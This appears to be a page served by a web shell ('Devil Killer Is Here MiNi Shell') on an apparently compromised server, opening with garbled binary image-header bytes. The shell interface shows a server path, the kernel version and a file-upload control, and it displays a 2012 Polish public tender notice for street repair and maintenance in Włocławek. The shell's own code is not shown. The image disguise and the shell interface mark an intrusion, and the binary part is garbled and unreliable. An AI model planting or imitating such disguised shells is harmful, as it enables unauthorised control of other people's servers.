JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120713/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120713/250806-N-2012.html

<p class="kh_header"><b>Włocławek: Remonty i utrzymanie ulic na terenie miasta Włocławek w latach 2013- 2014</b><br>
<b>Numer ogłoszenia: 250806 - 2012; data zamieszczenia: 13.07.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miejski Zarząd Dróg , ul. Zielna 13/21, 87-800 Włocławek, woj. kujawsko-pomorskie, tel. 054 4121323, faks 054 4121323.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.mzdwloclawek.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Remonty i utrzymanie ulic na terenie miasta Włocławek w latach 2013- 2014.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia są remonty i utrzymanie dróg krajowych, powiatowych, wojewódzkich, gminnych oraz  wewnętrznych na terenie miasta Włocławek realizowanych w okresie od 01.01.2013r do 31.12.2014r  w zakresie robót (prac).
I.	Roboty ziemne

1. Zakres robót objętych zamówieniem zawiera Kosztorys Ofertowy pozycje od 1 do 9.
2. Zamówienie obejmuje następujące roboty podstawowe:
    - odspojenie gruntu wykonywane ręcznie lub mechanicznie z przerzutem na odkład lub  
      z wywozem urobku w miejsce wskazane przez Zamawiającego znajdujące się na 
      terenie miasta Włocławek (transport urobku do 20km);
    - w przypadku braku możliwości skarpowania wykopy należy zabezpieczyć szalunkami 
      stalowymi lub prowadzić w obudowach typu BOKS;
    - zasypanie wykopu wykonane ręcznie lub mechanicznie z gruntu z wykopu lub  
      piaskiem dostarczonym w miejsce wbudowania;
    - załadunek i wywóz gruntu z odkładu wykonany mechanicznie. Miejsce odwozu 
      zostanie wskazane przez Zamawiającego znajdujące się na terenie miasta Włocławek 
      (transport urobku do 20km);
3. Wymagania techniczne wykonania i odbioru robót przedstawione są w Szczegółowych 
    Specyfikacjach Technicznych, stanowiących integralną część niniejszej SIWZ.

II.	Roboty rozbiórkowe

1. Zakres robót objętych zamówieniem zawiera Kosztorys Ofertowy pozycje od 10 do 
    39.
2. Zamówienie obejmuje następujące roboty podstawowe:
    - rozbiórkę warstw podbudów, nawierzchni, krawężniki, obrzeża, oporniki, ławy 
      betonowe, ścieki, chodniki z wywozem gruzu poza teren robót z zagospodarowaniem  
      przez Wykonawcę lub odwiezieniem na składowisko (transport do 20km);
    - sortowanie rozebranych elementów z odwozem nadających się do ponownego 
      wbudowania jeśli tak zadecyduje Inspektor Nadzoru. Miejsce odwozu zostanie 
      wskazane przez Zamawiającego znajdujące się na terenie miasta Włocławek (transport 
    urobku do 20km);
3. Wymagania techniczne wykonania i odbioru robót przedstawione są w Szczegółowych 
    Specyfikacjach Technicznych, stanowiących integralną część niniejszej SIWZ.

III.	Podbudowy

1. Zakres robót objętych zamówieniem zawiera Kosztorys ofertowy pozycje od 40 do 
    59.
2. Zamówienie obejmuje następujące roboty podstawowe:
    - wykonanie koryta (profilowanie i zagęszczanie podłoża gruntowego) przeznaczonego 
      do ułożenia konstrukcji nawierzchni dróg i chodników;
    - wykonanie warstwy odsączającej z piasku wraz z zagęszczeniem;
    - wykonanie podbudowy betonowej z betonu c16)20 z pielęgnacją piaskiem i wodą;
    - wykonanie podbudowy z tłucznia kamiennego z zagęszczeniem warstwy;
    - wykonanie podbudowy z płyt drogowych  betonowych sześciokątnych lub  
      kwadratowych o grubości 15  cm z wypełnieniem spoin piaskiem;
    - podbudowa z mieszanki mineralno-cementowo-emulsyjnej wykonana na miejscu lub z 
      gotowej mieszanki dostarczonej w miejsce wbudowania;
    - podbudowa z destruktu betonowego. Gruz betonowy o frakcji 0-63,5 mm 
      przekruszony z betonów o wytrzymałości minimum c8)10;
3. Dla pozycji gdzie roboty należy wykonać z materiału Zamawiającego. Zamawiający 
    wskaże miejsce składowania materiałów zlokalizowane na terenie miasta Włocławek a 
    Wykonawca załaduje i dowiezie materiał w miejsce wbudowania (transport do 20km);
4.	Wymagania techniczne wykonania i odbioru robót przedstawione są w Szczegółowych Specyfikacjach Technicznych, stanowiących integralną część niniejszej SIWZ.

IV.	Nawierzchnie

1. Zakres robót objętych zamówieniem zawiera Kosztorys Ofertowy pozycje od 60 do 
    109.
2. Zamówienie obejmuje następujące roboty podstawowe:
    - mechaniczne oczyszczenie nawierzchni ulepszonych asfaltowych;
    - skropienie nawierzchni nieulepszonych emulsją asfaltową średniorozpadową K2;
    - skropienie nawierzchni ulepszonych asfaltowych emulsją asfaltową szybkorozpadową 
      K1-60;
    - ulepszenie podłoża piaszczystego doziarnionego pospółką i cementem w korycie drogi, 
      wytrzymałość Rm=2,5 MPa, pielęgnacja podłoża przez posypanie piaskiem i  
      polewanie wodą;
    - profilowanie istniejącej podbudowy mieszanką mineralno - bitumiczną wg PN-EN 
      13108-1 dla ruchu ciężkiego;
    - wykonanie nawierzchni z mieszanek mineralno - bitumicznych wg PN-EN 13108-1 dla 
      ruchu ciężkiego. Warstwa wiążąca i ścieralna;
    - wykonanie nawierzchni z mieszanek mineralno - bitumicznych SMA;
    - wykonanie cienkich warstw bitumicznych na gorąco z betonu asfaltowego do bardzo 
      cienkich warstw wg WT-2 2010 o grubości warstwy po zagęszczeniu od 2,0 cm do 3,0 
      cm;
    - wykonanie uszczelniajacej i uszorstniajacej cienkiej warstwy nawierzchni z mieszanki 
      mineralno-bitumicznej na zimno. Warstwa ścieralna o grubości od 8 do 10 mm oraz 
      warstwa wyrównawcza o grubości od 4 do 5 mm;
    - wykonanie nawierzchni pojedyńczo lub podwójnie utrwalonej grysami i emulsją 
      asfaltową modyfikowaną;
    - wykonanie nawierzchni z płyt drogowych  betonowych sześciokątnych lub 
      kwadratowych o grubości 15  cm z wypełnieniem spoin piaskiem;
    - wykonanie nawierzchni z kostki betonowej szarej lub kolorowej grubości 8 cm na 
      podsypce cementowo - piaskowej;
    - wykonanie nawierzchni chodników z kostki betonowej szarej lub kolorowej grubości 6 
      cm na podsypce cementowo - piaskowej;
    - wykonanie nawierzchni z kostki kamiennej 4)6 lub 9)11 cm na podsypce cementowo - 
      piaskowej;
    - wykonanie nawierzchni z płyt ażurowych o powierzchni do 1m2 ułożonych na 
      podsypce piaskowej;
    - wykonanie nawierzchni z kamienia narzutowego (polnego), wysoko˜ść† brukowca 
      16-20 cm;
    - wykonanie nawierzchni betonowej z betonu c20)25 z wykonaniem szczelin 
      dylatacyjnych oraz pielęgnacją nawierzchni;
    - wykonanie nawierzchni betonowej z betonu c30)37 z dodatkiem zbrojenia 
      rozproszonego (włókna stalowe w ilości 20 kg)m3 mieszanki) z wykonaniem szczelin 
      dylatacyjnych oraz pielęgnacją nawierzchni;
    - wykonanie nawierzchni chodników z materiałów: płyt betonowych 50x50x7 cm, płyt 
      betonowych 35x35x5 cm, kostki betonowej gr 6 cm kolorowej lub szarej na podsypce 
      cementowo - piaskowej;
    - wykonanie nawierzchni z płyt żelbetowych pełnych o powierzchni płyty ponad 3,0 m2 
      ułożonych na podsypce piaskowej;
    - wykonanie nawierzchni z destruktu asfaltowego. Destrukt asfaltowy zgodny z SST D-
      04.10.01;
    - profilowanie nawierzchni gruntowych równiarką z zagęszczeniem walcem ogumionym.
    - wykonanie doziarnienia dróg gruntowych destruktem betonowym lub asfaltowym z 
      wyprofilowaniem nawierzchni i zagęszczeniem. Wymagania co do destruktu 
      betonowego jak przy wykonaniu podbudowy, destrukt asfaltowy zgodny z SST D-
      04.10.01;
3. Dla pozycji gdzie roboty należy wykonać z materiału Zamawiającego. Zamawiający 
    wskaże miejsce składowania materiałów zlokalizowane na terenie miasta Włocławek a   
    Wykonawca załaduje i dowiezie materiał w miejsce wbudowania (transport do 20km);
4. Wymagania techniczne wykonania i odbioru robót przedstawione są w Szczegółowych   
    Specyfikacjach Technicznych, stanowiących integralną część niniejszej SIWZ.

V.	Krawężniki i obrzeża

1. Zakres robót objętych zamówieniem zawiera Kosztorys Ofertowy pozycje od 110 do 
    120.
2. Zamówienie obejmuje następujące roboty podstawowe:
    - wykonanie koryta pod ławy krawężnikowe z wywozem urobku w miejsce wskazane 
    przez Zamawiającego znajdujące się na terenie miasta Włocławek (transport urobku do 
    20km)
    - ustawienie krawężników betonowych lub kamiennych wystających lub wtopionych na 
      ławie z betonu c12)15;
    - ustawienie oporników betonowych na ławie z betonu c12)15;
    - ustawienie obrzeży betonowych;
    - w przypadku ustawiania krawężników betonowych na łukach o promieniu mniejszym 
      niż 12 m należy stosować krawężniki łukowe;
3. Przy pozycjach w których materiał zapewnia Zamawiający (tj. Krawężniki, oporniki, 
    obrzeża) Zamawiający wskaże miejsce składowania materiałów zlokalizowane na 
    terenie miasta Włocławek a Wykonawca załaduje i dowiezie materiał w miejsce 
    wbudowania (transport do 20km);
4. Wymagania techniczne wykonania i odbioru robót przedstawione są w Szczegółowych 
    Specyfikacjach Technicznych, stanowiących integralną część niniejszej SIWZ.



VI.	Remont i utrzymanie kanalizacji deszczowej

1. Zakres robót objętych zamówieniem zawiera Kosztorys Ofertowy pozycje od 121 do 
    180h.
2. Zamówienie obejmuje następujące roboty podstawowe:
    - wykonanie studni chłonnych z kręgów betonowych w gotowym wykopie. Wykonanie 
      komina z kręgów, montaż pokrywy nastudziennej z pierścieniem odciążającym i 
      włazem kanałowym żeliwnym dla ruchu ciężkiego klasy D400;
    - demontaż studni rewizyjnych lub chłonnych w gotowym wykopie. Demontaż włazu, 
      pokrywy nastudziennej, pierścienia odciążającego oraz komina z kręgów betonowych z 
      wywozem gruzu poza teren robót;
    - wykonanie kanału z rur z tworzywa sztucznego PVC kielichowe o sztywności ścianek 
      SN8 zgodne z PN-EN 1401-1, PN-EN 13476;
    - demontaż rurociągu betonowego kielichowego lub kamionkowego w gotowym 
      wykopie;
    - demontaż studzienki ściekowej ulicznej betonowej o średnicy 500 mm z osadnikiem i 
      syfonem. Rozebranie nawierzchni i podbudowy wokół wpustu, demontaż obudowy 
      żeliwnej, pokrywy nastudziennej, pierścienia odciążającego, nadstawki betonowej, 
      osadnika, syfonu, odłączenie przykanalika;
    - regulacja pionowa studzienek wpustów i włazów kanałowych kanalizacji deszczowej. 
      Demontaż i ponowny montaż pierścienia, pokrywy nastudziennej i obudowy żeliwnej. 
      W przypadku niemożliwości odzyskania elementów wpustu należy zastosować nowe 
      materiały. Nowe wpusty żeliwne oraz włazy kanałowe z żeliwa szarego klasy D400;
    - uzupełnienie brakującego rusztu wpustu ulicznego. Ruszty żeliwne dla wpustów klasy 
      D400 z żeliwa szarego. W przypadku konieczności zabezpieczenia rusztu przed 
      kradzieżą należy go przyspawać elektrodami do spawania żeliwa. Długość spawu 
      czołowego dla jednego rusztu około 25 cm;
    - uzupełnienie pokrywy żelbetowej o średnicy fi 70cm na kominach studni kanalizacji 
      deszczowej;
    - naprawa elementów betonowych kanalizacji deszczowej (przykanaliki betonowe, 
      kolektory, kanały, kominy studni rewizyjnych). Ręczne rozkucie uszkodzonego betonu, 
      oczyszczenie betonu i nawilżenie wodą, przygotowanie, ustawienie i rozebranie 
      deskowania, ułożenie mieszanki betonowej z betonu c16/20 w deskowaniu wraz z 
      zagęszczeniem i wyrównaniem powierzchni, pielęgnacja betonu. W przypadku 
      konieczności szybkiego zakończenia prac należy zastosować zaprawy hydrauliczne s
      szybko wiążące;
    - regulacje wysokościowe skrzynek zasuw wodociągowych i gazowych oraz studni 
      teletechnicznych. Rozebranie nawierzchni i podbudowy wokół urządzenia, demontaż 
      oraz ponowny montaż obudowy na wymaganą wysokość;
    - udrożnianie wpustów ulicznych, czyszczenie separatorów, piaskowników, studni   
      chłonnych, studni rewizyjnych, liniowych ścieków, dylatacji na mostach i wiaduktach, 
      cieków przykrawężnikowych, (koryt GARA), ściąganie wód opadowych;
    - wymiana materiału chłonnego w studniach chłonnych;
    - mechaniczne czyszczenie kanałów kołowych;
    - utrzymanie przepompowni;
3. Dla pozycji gdzie roboty należy wykonać z materiału Zamawiającego. Zamawiający 
    wskaże miejsce składowania materiałów zlokalizowane na terenie miasta Włocławek a 
    Wykonawca załaduje i dowiezie materiał w miejsce wbudowania (transport do 20km). 
    Gruz oraz materiały nienadające się do ponownego wbudowania odwieść poza teren 
    robót z zagospodarowaniem przez Wykonawcę lub odwiezieniem na składowisko.
4. Wymagania techniczne wykonania i odbioru robót przedstawione są w Szczegółowych 
    Specyfikacjach Technicznych, stanowiących integralną część niniejszej SIWZ



VII.	Remonty nawierzchni

1. Zakres robót objętych zamówieniem zawiera Kosztorys Ofertowy pozycje od 181 do 
    210.
2. Zamówienie obejmuje następujące roboty podstawowe:
    - frezowanie nawierzchni bitumicznych frezarką o szerokości frezowania minimum 1,0m 
      wraz z oczyszczeniem i odwozem destruktu. Zamawiający wskaże miejsce składowania 
      destruktu zlokalizowane na terenie miasta Włocławek (transport do 20km);
    - Remonty cząstkowe nawierzchni bitumicznych grysami kamiennymi i emulsją 
      asfaltową wykonywane przy pomocy remontera drogowego;
    - Remonty cząstkowe  nawierzchni  bitumicznych  mieszankami mineralno - asfaltowymi 
      z docięciem, dokuciem, smarowaniem wykonywane przy użyciu recyklera. Materiał z 
      rozbiórki uszkodzonej nawierzchni po doziarnieniu i dodaniu asfaltu podgrzać w 
      recyklerze do temperatury 140 - 160 st C. Wbudowywana masa mineralno - asfaltowa 
      z recyklera dla KR3-6 o uziarnieniu 0)12,8 dla warstw ścieralnych zgodna z PN-S-
      96025:2000. Dla warstwy podbudowy mieszanka mineralno - asfaltowa z recyklera dla 
      KR3-6 o uziarnieniu dostosowanym do głębokości wykonywanych napraw zgodna z 
      PN-S-96025:2000;
    - Remonty cząstkowe  nawierzchni  bitumicznych  mieszankami mineralno - 
      asfaltowymi z docięciem, dokuciem, smarowaniem i odwozem destruktu asfaltowego. 
      Mieszanka mineralno - asfaltowa dla KR3-6 o uziarnieniu dostosowanym do 
      głębokości wykonywanych napraw dla warstwy ścieralnej i podbudowy zgodna z wg 
      PN-EN 13108-1;
    - Remonty cząstkowe  nawierzchni  bitumicznych  mieszankami na zimno. Remont 
      będzie wykonywany w trybie pilnym na wezwanie Zamawiającego lub w warunkach 
      uniemożliwiających wykonanie remontu masami na gorąco;
    - Remonty cząstkowej nawierzchni z płyt drogowych betonowych sześciokątnych lub 
      kwadratowych o grubości 15 cm, nawierzchni z kostki betonowej gr 6 lub 8 cm, 
      nawierzchni brukowcowych z kamienia narzutowego 16-20 cm, nawierzchni z kostki 
      kamiennej, nawierzchni z płyt ażurowych oraz pełnych betonowych, chodników z płyt 
      betonowych, krawężników i obrzeży betonowych. Roboty obejmują rozebranie 
      elementów, sortowanie w celu ponownego wbudowania, profilowanie i zagęszczenie 
      podłoża, rozścielenie podsypki cementowo - piaskowej lub piaskowej oraz ponowne 
      wbudowanie elementów;
3. Gruz oraz materiały nienadające się do ponownego wbudowania odwieść poza teren  
    robót z zagospodarowaniem przez Wykonawcę lub odwiezieniem na składowisko.
4. Wymagania techniczne wykonania i odbioru robót przedstawione są w Szczegółowych   
    Specyfikacjach Technicznych, stanowiących integralną część niniejszej SIWZ

VIII.	Konserwacja i remonty sygnalizacji świetlnych

1. Zakres robót objętych zamówieniem zawiera Kosztorys Ofertowy pozycje od 211 do 
    274.
2. Zamówienie obejmuje następujące roboty podstawowe:
    Bieżącym utrzymaniem i remontami objęte są wszystkie sygnalizacje świetlne będące w 
    zarządzie MZD we Włocławku. 
    Do obowiązków wykonawcy z zakresie prac utrzymaniowych należy:
    a. codzienny przegląd stanu technicznego wszystkich sygnalizacji świetlnych;
    b. czyszczenie masztów i sygnalizatorów wg potrzeb (zlecenie Zamawiającego);
    c. usuwanie zaistniałych awarii sygnalizacji wynikających z jej pracy;
    d. wymiana przepalonych źródeł światła w sygnalizatorach;
    e. sprawdzanie i regulacja wszystkich urządzeń detekcyjnych w sygnalizacjach;
    f. całodobowej dyspozycyjności pod telefonicznym numerem dyżurnym;
    g. obsługa zdalna(GSM, WIFI) i bezpośrednia sterowników;
3. Materiały nadające się do ponownego wbudowania jeśli tak zadecyduje Inspektor 
    Nadzoru odwieść w miejsce wskazane przez Zamawiającego znajdujące się na terenie 
    miasta Włocławek (transport urobku do 20km);
4. Gruz oraz materiały nienadające się do ponownego wbudowania odwieść poza teren 
    robót z zagospodarowaniem przez Wykonawcę lub odwiezieniem na składowisko.
5. Wymagania techniczne wykonania i odbioru robót przedstawione są w Szczegółowych   
    Specyfikacjach Technicznych, stanowiących integralną część niniejszej SIWZ

IX.	 Oznakowanie poziome

1. Zakres robót objętych zamówieniem zawiera Kosztorys Ofertowy pozycje od 275 do 
    285.
2. Zamówienie obejmuje następujące roboty podstawowe:
    Wykonywanie oznakowania poziomego winno być robione w warunkach 
    atmosferycznych określonych przez producentów materiałów przeznaczonych do 
    wykonywania tych prac. Przystąpienie do wykonywania prac musi nastąpić nie później 
    niż 24 godziny od chwili otrzymania zlecenia od zamawiającego, ze szczegółowym 
    wykazem prac do wykonania. O rozpoczęciu prac Wykonawca powiadomi niezwłocznie 
    uprawnionego przedstawiciela Zamawiającego.
    Wszystkie prace przy oznakowaniu poziomym należy wykonywać poza godzinami 
    szczytu komunikacyjnego.
3. Wymagania techniczne wykonania i odbioru robót przedstawione są w Szczegółowych   
    Specyfikacjach Technicznych, stanowiących integralną część niniejszej SIWZ

X.	Opracowanie Projektów Organizacji Ruchu

1. Zakres robót objętych zamówieniem zawiera Kosztorys Ofertowy pozycje od 286 do 
    287.
2. Zamówienie obejmuje następujące roboty podstawowe:
    Opracowanie projektów organizacji ruchu dla robót remontowych i utrzymaniowych 
    prowadzonych w pasie drogowym ulic na terenie miasta Włocławka w przypadkach 
    wymagających wprowadzenia czasowych lub stałych zmian w istniejącej organizacji 
    ruchu związanych z:
    - wyłączeniami z ruchu chodników;
    - wyłączeniami z ruchu części jezdni;
    - robotami w pasach międzyjezdniowych;
    - całkowitym zamknięciem ulic i organizacją objazdów;
    - opracowywanie projektów ruchowych sygnalizacji świetlnych;
    Dokumentacja przekazywana Zamawiającemu musi:
    - zawierać trzy egzemplarze OR uzgodnionej z SRD KMP dla ulic, dla których jest to 
    wymagane i być zatwierdzona przez organ zarządzający ruchem na tych ulicach.
    - być opracowany zgodnie z rozporządzeniem Ministra Infrastruktury z dnia 23 września 
      2003r. w sprawie szczegółowych warunków zarządzania ruchem na drogach i 
      sprawowania nadzoru nad tym zarządzeniem (Dz. U. nr 177 z 2003r poz. 1729) z 
      późniejszymi zmianami
    Przy opracowywaniu projektów OR obowiązują następujące przepisy:
    - rozporządzenie Ministra Infrastruktury z dnia 23 września 2003r. w sprawie 
      szczegółowych warunków zarządzania ruchem na drogach i sprawowania nadzoru nad 
      tym zarządzeniem (Dz. U. nr 177 z 2003r poz. 1729) z późniejszymi zmianami.
    - rozporządzenie Ministra Infrastruktury z 3 lipca 2003r. (Dz. U. nr 220 z 2003r. Poz. 
      2181) W sprawie szczegółowych warunków technicznych dla znaków i sygnałów 
      drogowych oraz urządzeń bezpieczeństwa ruchu drogowego i warunków ich 
      umieszczania na drogach. Wraz z późniejszymi zmianami.
    - Ustawa z dnia 20 czerwca 1997r. Prawo o ruchu drogowym (Dz. U. nr 108 z 2005r. 
      Poz. 908) z późniejszymi zmianami.
    - Ustawa z dnia 21 marca 1985r. O drogach publicznych (Dz. U. nr 14 poz. 60 z 1985r)
      z późniejszymi zmianami.

XI.	 Oznakowanie Pionowe

1. Zakres robót objętych zamówieniem zawiera Kosztorys Ofertowy pozycje od 288 do 
    304.
2. Zamówienie obejmuje następujące roboty podstawowe:
    Bieżącym utrzymaniem oznakowania pionowego objęte są wszystkie drogi krajowe, 
    wojewódzkie, powiatowe i gminne w granicach miasta Włocławka.

    a. Codzienny przegląd stanu oznakowania na terenie miasta;
    b. Uzupełnianie brakującego oznakowania, konserwacja i utrzymanie w czystości;
    c. Oznakowanie ze względów bezpieczeństwa w ramach tzw Pogotowia Drogowego     
       wszelkich awarii zaistniałych na terenie miasta, a zgłoszonych przez Zamawiającego, 
       Policję, lub inne służby porządkowe. Wykonawca zobowiązany jest do sporządzania 
       dokumentacji fotograficznej wszelkich napraw oznakowania. Taka dokumentacja 
       stanowić będzie załącznik do faktury rozliczającej zużyte materiały;
    d. Oznakowanie zgodnie z przekazanym przez Zamawiającego projektem czasowych 
        zmian organizacji ruchu drogowego przy robotach wykonywanych na rzecz MZD;
    e. Oznakowanie zgodnie z przekazanym przez Zamawiającego projektem imprez 
        okolicznościowych organizowanych na rzecz miasta.
3. Oznakowanie pionowe musi być utrzymywane w stanie czytelnym i kompletnym, 
    zgodnym z projektami stałej organizacji ruchu, które są do wglądu u Zamawiającego.
    W związku z tym Wykonawca jest zobowiązany do całodobowej dyspozycyjności 7 dni w 
    tygodniu w ramach Pogotowia Drogowego. 
    Wszystkie roboty należy wykonywać zgodnie z obowiązującymi normami i SST.
    Zamawiający rozliczy materiały wbudowane w ramach prac konserwacyjnych na 
    podstawie dokumentacji zdjęciowej, dokumentacji projektowej i wizji w terenie.
4.	Materiały nadające się do ponownego wbudowania jeśli tak zadecyduje Inspektor 
     Nadzoru. Miejsce odwozu zostanie wskazane przez Zamawiającego znajdujące się na  
     terenie miasta Włocławek (transport urobku do 20km)
     Gruz oraz materiały nienadające się do ponownego wbudowania odwieść poza teren 
     robót z zagospodarowaniem przez Wykonawcę lub odwiezieniem na składowisko.
5.	Wymagania techniczne wykonania i odbioru robót przedstawione są w Szczegółowych  
     Specyfikacjach Technicznych, stanowiących integralną część niniejszej SIWZ

XII.	Roboty i utrzymanie obiektów mostowych

1. Zakres robót objętych zamówieniem zawiera Kosztorys Ofertowy pozycje od 305 do 
    331.
2. Zamówienie obejmuje następujące roboty podstawowe:
    - naprawy umocnień stożków obiektów mostowych z uzupełnieniem ubytków;
    - naprawy powierzchni betonowych mostów zaprawami PCC;
    - czyszczenie i konserwacja dylatacji i łożysk mostowych oraz elementów odwodnienia;
    - naprawy stalowych barier sprężystych;
    - naprawa konstrukcji betonowych - rozbiórki, zbrojenie, betonowanie, izolacja,
    - naprawa nawierzchni chodników mostowych;
    - naprawa i uzupełnienie stalowych elementów konstrukcji mostowych;
    - naprawy powłoki antykorozyjnej powierzchni betonowych;
    - naprawy powłoki antykorozyjnej konstrukcji stalowych;
    - usunięcie graffiti i wykonanie powłoki antygraffiti.
3. Materiały nadające się do ponownego wbudowania jeśli tak zadecyduje Inspektor 
    Nadzoru. Miejsce odwozu zostanie wskazane przez Zamawiającego znajdujące się na 
    terenie miasta Włocławek (transport urobku do 20km)
    Gruz oraz materiały nienadające się do ponownego wbudowania odwieść poza teren 
    robót z zagospodarowaniem przez Wykonawcę lub odwiezieniem na składowisko.
4. Wymagania techniczne wykonania i odbioru robót przedstawione są w Szczegółowych   
Specyfikacjach Technicznych, stanowiących integralną część niniejszej SIWZ

XIII.	Brygada Interwencyjna

1. Zakres robót objętych zamówieniem zawiera Kosztorys Ofertowy pozycja 332.
2. Zamówienie obejmuje następujące roboty podstawowe:
    -  doraźne zabezpieczenie ubytków w nawierzchni masą na zimno. Oprócz czasu pracy 
      brygady interwencyjnej osobno będzie rozliczany zakres robót z pozycji nr 196 
      kosztorysu ofertowego;
    - uczestnictwo w uporządkowaniu pasa drogi po zaistniałych wypadkach - w tym 
      drobne roboty poprawkowe po wyspecjalizowanych służbach ratowniczych np. Straży   
      Pożarnej;
